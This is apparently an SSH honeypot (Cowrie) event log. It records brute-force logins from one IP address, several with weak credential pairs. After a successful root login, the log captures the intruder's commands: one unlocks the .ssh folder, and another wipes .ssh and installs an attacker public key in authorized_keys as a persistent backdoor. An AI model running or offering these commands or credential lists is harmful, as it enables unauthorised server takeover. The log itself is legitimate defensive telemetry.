03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:45.032593Z","src_ip":"212.227.235.229","session":"c4ae393e3b0e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:46.053393Z","src_ip":"212.227.235.229","session":"c4ae393e3b0e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.287694Z","src_ip":"212.227.235.229","session":"c4ae393e3b0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57280,"dst_ip":"1.2.3.4","dst_port":22,"session":"09e6a294082f","protocol":"ssh","message":"New connection: 212.227.235.229:57280 (1.2.3.4:22) [session: 09e6a294082f]","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.511151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.565033Z","src_ip":"212.227.235.229","session":"09e6a294082f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41784,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb17ab82c79","protocol":"ssh","message":"New connection: 212.227.235.229:41784 (1.2.3.4:22) [session: 8eb17ab82c79]","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.775787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.776484Z","src_ip":"212.227.235.229","session":"8eb17ab82c79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:47.777511Z","src_ip":"212.227.235.229","session":"09e6a294082f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:48.109416Z","src_ip":"212.227.235.229","session":"8eb17ab82c79"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:48.774441Z","src_ip":"212.227.235.229","session":"09e6a294082f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:49.062845Z","src_ip":"212.227.235.229","session":"09e6a294082f"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:49.063759Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:49.481085Z","src_ip":"212.227.235.229","session":"8eb17ab82c79"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:50.816294Z","src_ip":"212.227.235.229","session":"8eb17ab82c79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57962,"dst_ip":"1.2.3.4","dst_port":22,"session":"b033a533bea7","protocol":"ssh","message":"New connection: 212.227.235.229:57962 (1.2.3.4:22) [session: b033a533bea7]","sensor":"my-vps","timestamp":"2025-09-08T22:42:17.615970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T22:42:17.617578Z","src_ip":"212.227.235.229","session":"b033a533bea7"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T22:42:18.131685Z","src_ip":"212.227.235.229","session":"b033a533bea7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57452,"dst_ip":"1.2.3.4","dst_port":22,"session":"f42e5e0040eb","protocol":"ssh","message":"New connection: 212.227.235.229:57452 (1.2.3.4:22) [session: f42e5e0040eb]","sensor":"my-vps","timestamp":"2025-09-08T22:42:19.924376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:19.924971Z","src_ip":"212.227.235.229","session":"f42e5e0040eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:20.154969Z","src_ip":"212.227.235.229","session":"f42e5e0040eb"}
{"eventid":"cowrie.login.failed","username":"web","password":"changeme","message":"login attempt [web/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:42:21.073737Z","src_ip":"212.227.235.229","session":"f42e5e0040eb"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:24.092473Z","src_ip":"212.227.235.229","session":"f42e5e0040eb"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:25.060751Z","src_ip":"212.227.235.229","session":"b033a533bea7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35424,"dst_ip":"1.2.3.4","dst_port":22,"session":"df2d0d5c26d5","protocol":"ssh","message":"New connection: 212.227.235.229:35424 (1.2.3.4:22) [session: df2d0d5c26d5]","sensor":"my-vps","timestamp":"2025-09-08T22:42:40.377990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:40.378771Z","src_ip":"212.227.235.229","session":"df2d0d5c26d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:40.478833Z","src_ip":"212.227.235.229","session":"df2d0d5c26d5"}
{"eventid":"cowrie.login.failed","username":"huawei","password":"Welcome1","message":"login attempt [huawei/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:42:40.919233Z","src_ip":"212.227.235.229","session":"df2d0d5c26d5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:42.021733Z","src_ip":"212.227.235.229","session":"df2d0d5c26d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35274,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b44dc75bac7","protocol":"ssh","message":"New connection: 212.227.235.229:35274 (1.2.3.4:22) [session: 0b44dc75bac7]","sensor":"my-vps","timestamp":"2025-09-08T22:42:47.713866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:47.714624Z","src_ip":"212.227.235.229","session":"0b44dc75bac7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:47.968860Z","src_ip":"212.227.235.229","session":"0b44dc75bac7"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:42:49.026119Z","src_ip":"212.227.235.229","session":"0b44dc75bac7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:50.282512Z","src_ip":"212.227.235.229","session":"0b44dc75bac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48244,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc7ae5a4dec6","protocol":"ssh","message":"New connection: 212.227.235.229:48244 (1.2.3.4:22) [session: cc7ae5a4dec6]","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.453767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.454725Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37932,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfc2a330de85","protocol":"ssh","message":"New connection: 212.227.235.229:37932 (1.2.3.4:22) [session: dfc2a330de85]","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.528063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.529201Z","src_ip":"212.227.235.229","session":"dfc2a330de85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.765127Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:55.856498Z","src_ip":"212.227.235.229","session":"dfc2a330de85"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:42:57.048083Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:42:57.203784Z","src_ip":"212.227.235.229","session":"dfc2a330de85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:42:57.746358Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:42:57.747243Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:42:57.748387Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:58.060133Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:58.531612Z","src_ip":"212.227.235.229","session":"dfc2a330de85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:42:58.699420Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:42:58.700220Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:42:59.012773Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:42:59.013672Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49640,"dst_ip":"1.2.3.4","dst_port":22,"session":"6170b049964f","protocol":"ssh","message":"New connection: 212.227.235.229:49640 (1.2.3.4:22) [session: 6170b049964f]","sensor":"my-vps","timestamp":"2025-09-08T22:42:59.323167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:42:59.324668Z","src_ip":"212.227.235.229","session":"6170b049964f"}
